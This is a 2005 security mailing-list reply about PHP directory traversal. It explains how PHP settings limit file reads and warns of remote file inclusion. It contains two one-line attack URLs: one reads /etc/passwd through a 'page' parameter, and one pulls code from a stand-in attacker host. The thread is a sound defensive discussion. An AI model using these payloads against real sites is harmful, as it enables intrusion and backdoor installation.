WebApp Sec mailing list archives
Re: PHP Directory Transversal
From: John GALLET <john.gallet () wanadoo fr>
Date: Mon, 14 Mar 2005 09:06:25 +0100 (CET)
Hi there,
Therefore, I tried doing a www.example.com/static.php?page=../../../../../../etc/passwd but I get an error saying that file doesn't exist. I user the same source code in my server, and I could retrieve the file...what can be happening? I don't think it is under a chroot jail...
What you can or can not read depends on the configuration of php (include_path vs safe mode for example). Have a look at : http://fr3.php.net/features.safe-mode Now the real risk is not so much reading some source code as executing some other people's code. www.example.com/static.php?page=http://evilcracker.com/evil_code.txt has good chances of also getting executed, which opens the path to install any backdoor, download perl scripts/trojans, etc... HTH JG
Current thread:
- PHP Directory Transversal Andres Molinetti (Mar 13)
- Re: PHP Directory Transversal Felikz (Mar 13)
- Re: PHP Directory Transversal Andres Molinetti (Mar 13)
- RE: PHP Directory Transversal Mehmet Buyukozer (Mar 13)
- Re: PHP Directory Transversal Andres Molinetti (Mar 13)
- Re: PHP Directory Transversal Richard Moore (Mar 13)
- Re: PHP Directory Transversal Sarath Kummamuru (Mar 13)
- RE: PHP Directory Transversal Ravish (Mar 13)
- Re: PHP Directory Transversal David M. Zendzian (Mar 13)
- Re: PHP Directory Transversal John GALLET (Mar 18)
- Re: PHP Directory Transversal Andres Molinetti (Mar 18)
- Re: PHP Directory Transversal Alex 'CAVE' Cernat (Mar 20)
- Re: PHP Directory Transversal Andres Molinetti (Mar 18)
- Re: PHP Directory Transversal Felikz (Mar 13)